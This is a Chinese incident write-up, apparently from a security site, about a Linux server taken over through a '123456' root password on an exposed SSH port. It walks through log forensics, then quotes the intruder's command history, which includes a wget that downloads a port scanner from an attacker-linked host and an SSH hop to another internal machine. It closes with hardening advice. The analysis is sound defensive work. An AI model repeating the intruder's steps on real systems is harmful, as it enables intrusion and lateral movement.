root密码被修改

新装机的Linux服务器替换老服务器，并且接通了外网，之前一直以为外网SSH的22端口是不通的，都是在内网跳板机SSH登陆，所以没太注意密码复杂度，装机时root密码设为123456了。而实际上外网的22端口是开放的。第二天发现SSH登陆不了，提示密码错误。运维人员进入机房
采用单用户模式进入服务器修改密码，才又可以登陆。

拿回密码之后排查被入侵过程如下。

谁成功登陆过？

[root@localhost home]# grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'      #secure文件每周归档加上-归档时间，如果查上周登陆将secure改为secure-上周最后一天日期
Jun 08 21:21:26 root 10.1.1.5        #登录成功的日期、时间、用户名、IP
Jun 08 22:52:48 root 10.1.1.5      【跳板机使用123456登陆】
Jun 08 23:24:27 root 10.1.1.5    
Jun 09 00:08:29 root 194.165.16.45  【俄罗斯IP，外网使用123456登陆】
Jun 09 01:19:39 root 223.112.28.14  【南京IP，外网使用123456登陆】
Jun 09 01:20:16 root 92.80.248.158  【罗马尼亚IP，外网使用123456登陆】
Jun 09 16:06:38 root 10.1.1.5      
Jun 09 16:10:00 root 10.1.1.5    【单用户修改密码后跳板机可以登陆】

执行grep “Failed password for root” /var/log/secure | awk ‘{print $11}’ 查看看自己的服务器有没有人尝试破解

入侵者登陆后做了什么？

[root@localhost home]#history | more 【去除自己执行的指令，剩下的就是入侵者的指令】
548 w    【查看登陆用户】
549 ls
550 free -mt   【查看内存】
551  lscpu
552  cat /proc/cpu info
553  cat /pro/cpcuinfo    #查看cpu信息
554  cat /proc/cpuinfo
555  ifconfig
556  ssh 10.1.1.26  【尝试内网其它服务器，如果其它服务器密码简单也会被攻陷】
557  w
558  passwd    【修改root密码】
559  wget nasapaul.com/masscan   【下载端口扫描工具，没成功】
560  wget
561  ls
562  df -h
563  nvidia-smi
564  w
565  ls
566  cat /etc/hosts
567  top

入侵者没有过多操作，改了root密码就离开了。不太清楚他会以后再来，还是到此为止。搜索nasapaul，可以看到一些其它服务器被攻击的信息，网上有个罗马尼亚黑客网名叫paul，高调嚣张，专门入侵服务器，并且不断在内网破解其它服务器的密码，利用服务器算力挖门罗币。结合登陆IP有罗马尼亚地址，很可能就是这个人。
他在这台服务器上只修改了密码就离开了，没有部署挖矿程序。

结论

替换之前的老服务器外网端口也是开的，但是多年未被登陆，就是因为密码比较复杂。
此事的教训就是

• root密码一定要有复杂度，一方面你认为不通外网的服务器未必不通外网。另一方面，和你同一局域网的机器被控制了，入侵者以它为跳板，你也直接面临来自外网的破解。
• 123456可能是最弱的密码，六个1可能都更好。
• 互联网SSH端口一定关闭。
• 修改/etc/ssh/sshd_config里的Port值为22之外的值，能增加破解难度。

来源：freebuf.com 2021-07-11 07:52:47 by: MySQL从删库到跑路

相关推荐: 创新黑马|观星入选《中国网络安全百强报告(2021)》创新能力百强企业并被评定为创新黑马企业 – 作者:DSO观星市场部

国内数字化产业第三方调研与咨询机构数世咨询于今日正式发布《中国网络安全百强报告(2021)》。数字观星凭借在网络资产测绘领域的技术优势与市场影响力实力入选通用概念——扫描领域细分领域，并被评定为创新黑马企业。本次百强报告调研了国内700余家经营网络安全业务的企…